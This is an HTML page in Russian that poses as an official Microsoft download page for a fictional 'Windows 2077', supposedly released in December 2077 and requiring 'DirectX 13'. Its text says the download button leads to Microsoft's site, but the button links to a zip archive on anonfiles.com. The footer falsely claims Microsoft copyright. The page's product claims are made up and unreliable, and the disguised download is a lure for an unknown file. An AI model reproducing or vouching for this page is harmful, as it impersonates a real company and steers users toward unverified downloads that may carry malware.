<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <style>
        body {
          font-family: Arial, sans-serif;
        }
      
        header {
          background-color: #333;
          color: #fff;
          padding: 20px;
          text-align: center;
        }
      
        nav {
          background-color: #eee;
          padding: 10px;
          text-align: center;
        }
      
        nav ul {
          display: inline-block;
          list-style: none;
          margin: 0;
          padding: 0;
        }
      
        nav li {
          display: inline-block;
          margin: 0 10px;
        }
      
        nav a {
          color: #333;
          text-decoration: none;
        }
      
        nav a:hover {
          color: #fff;
        }
      
        main {
          padding: 20px;
        }
      
        section {
          margin-bottom: 20px;
        }
      
        .download-button {
          background-color: #333;
          color: #fff;
          padding: 10px 80px;
          text-decoration: none;
        }
      
        .download-button:hover {
          background-color: #fff;
          color: #545151;
        }
      
        footer {
          background-color: #333;
          color: #fff;
          padding: 10px;
          text-align: center;
        }
      </style>      
    <title>Windows 2077</title>
  </head>
  <body>
    <header>
      <h1>Скачать Windows 2077</h1>
    </header>

    <nav>
      <ul>
        <li><a href="#overview">Обзор</a></li>
        <li><a href="#system-requirements">Системные требования</a></li>
        <li><a href="#download">Загрузить</a></li>
      </ul>
    </nav>

    <main>
      <section id="overview">
        <h2>Обзор</h2>
        <p>Windows 2077 - это последняя версия операционной системы Microsoft Windows, выпущенная в декабре 2077 года. В ней реализован ряд новых и улучшенных функций, включая новое меню "Пуск", виртуальные рабочие столы, поддержку сенсорных и голосовых команд. Независимо от того, переходите ли вы с более старой версии Windows или устанавливаете Windows 2077 впервые, процесс установки прост и понятен.</p>
      </section>

      <section id="system-requirements">
        <h2>Системные требования</h2>
        <ul>
          <li>64-разрядный процессор с тактовой частотой не менее 1 ГГц.</li>
          <li>Не менее 8ГБ ОЗУ.</li>
          <li>128 Гб места на жестком диске (или больше).</li>
          <li>Видеокарта, совместимая с DirectX 13.</li>
        </ul>
      </section>

      <section id="download">
        <h2>Загрузка</h2>
        <p>Чтобы скачать Windows 2077, просто нажмите на кнопку "Загрузить" ниже. Это приведет вас на сайт Microsoft, где вы сможете скачать последнюю версию Windows 2077 для вашего ПК или ноутбука. Этот процесс быстрый и простой, и вы быстро приступите к работе.</p>
      </section>
      <div style="text-align: center;">
        <img src="https://winzoro.net/uploads/posts/2021-01/1610533162_bandicam-2021-01-13-15-08-44-668.jpg" width="600">
        <img src="https://cdn.discordapp.com/attachments/1070686973058109501/1074360808018034708/image.png" width="600">
        <img src="https://i.pinimg.com/originals/9d/67/71/9d67713804548e545a62be4d007f5558.jpg" style="margin-top: 20px;" width="600">
        <p><a href="https://anonfiles.com/r76bo4Z5y3/windows_2077_zip" class="download-button">Загрузить</a></p>
      </div>
      
    </main>

    <footer>
      <p>Copyright &copy; Microsoft Corporation</p>
      <h1><img src="https://www.efcongress.com/wp-content/uploads/2020/01/partnerzy__microsoft-logo-microsoft-symbol-meaning-history-png-14.png"
        height="40"></h1>
    </footer>
  </body>
</html>
